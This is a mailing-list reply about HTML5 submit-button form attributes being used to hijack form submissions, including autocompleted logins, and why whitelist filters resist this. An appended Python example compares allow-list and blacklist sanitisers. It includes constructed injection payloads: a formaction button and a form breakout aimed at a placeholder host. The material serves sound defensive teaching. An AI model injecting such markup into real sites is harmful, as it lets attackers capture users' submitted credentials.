On Tue, 2 Aug 2011, Philippe De Ryck wrote:
>
> The new form attributes, which can be used with submit buttons, can make
> it difficult for a user to distinguish the form that is being submitted.
> This can be used by an adversary to trick the user into submitting a
> form, such as an autocompleted login form. Even though this attack was
> already possible with JavaScript enabled, this new vector does not
> depend on scripts. Additionally, it is possible that current content
> validation filters do not yet prevent against button injection.

Surely this was already possible by just injecting </form><form action...> in the same place as the button would be inserted today?

> Alternatively, if changing the specification is not possible, developers
> should be warned about this attack vector, so they can update their
> content filters.

Filters must be written using whitelists. A filter written using a blacklist is essentially worthless. A whitelist filter would not be affected by this or many other additions to HTML.

-- 
Ian Hickson
http://ln.hixie.ch/
Things that are impossible just take longer.
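An added illustration of the whitelist-versus-blacklist point above (example code, not from the thread or any filtering library): a small allow-list sanitiser built on Python's html.parser, beside a hypothetical tag-blacklist filter, run over the two vectors the thread discusses, a submit button carrying the HTML5 form/formaction attributes and a `</form><form action...>` breakout. The URL in the constructed payloads is a placeholder.

```python
import re
from html import escape
from html.parser import HTMLParser

# Allow-list: permitted tags and, per tag, permitted attributes. The HTML5
# "form"/"formaction" attributes are simply absent, so they can never pass.
ALLOWED = {"p": set(), "b": set(), "i": set(), "br": set(),
           "a": {"href"}, "button": {"type"}}

class AllowListFilter(HTMLParser):
    """Re-serialises input keeping only allow-listed tags and attributes."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return                      # unknown tag (form, input, ...): dropped
        kept = [(k, v) for k, v in attrs if k in ALLOWED[tag]]
        self.out.append("<%s%s>" % (tag, "".join(
            ' %s="%s"' % (k, escape(v or "", quote=True)) for k, v in kept)))

    def handle_endtag(self, tag):
        if tag in ALLOWED and tag != "br":
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(escape(data))   # text is re-escaped on output

def allowlist_filter(html):
    p = AllowListFilter()
    p.feed(html)
    p.close()
    return "".join(p.out)

def blacklist_filter(html):
    """Hypothetical legacy filter: strips <form>/<script> tags but knows
    nothing about the form attribute on submit buttons."""
    return re.sub(r"</?(form|script)\b[^>]*>", "", html, flags=re.I)

# Constructed payloads mirroring the two vectors discussed in the thread.
BUTTON_INJECTION = ('<button type="submit" form="login" '
                    'formaction="https://example.invalid/">Next</button>')
FORM_BREAKOUT = ('</form><form action="https://example.invalid/">'
                 '<input type="submit"></form>')

if __name__ == "__main__":
    for payload in (BUTTON_INJECTION, FORM_BREAKOUT):
        print("allow-list:", allowlist_filter(payload))
        print("blacklist: ", blacklist_filter(payload))
```

The allow-list filter neutralises both payloads without knowing anything about the new attribute, while the blacklist passes the button's form attribute untouched and leaves a stray submit input behind after the breakout.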
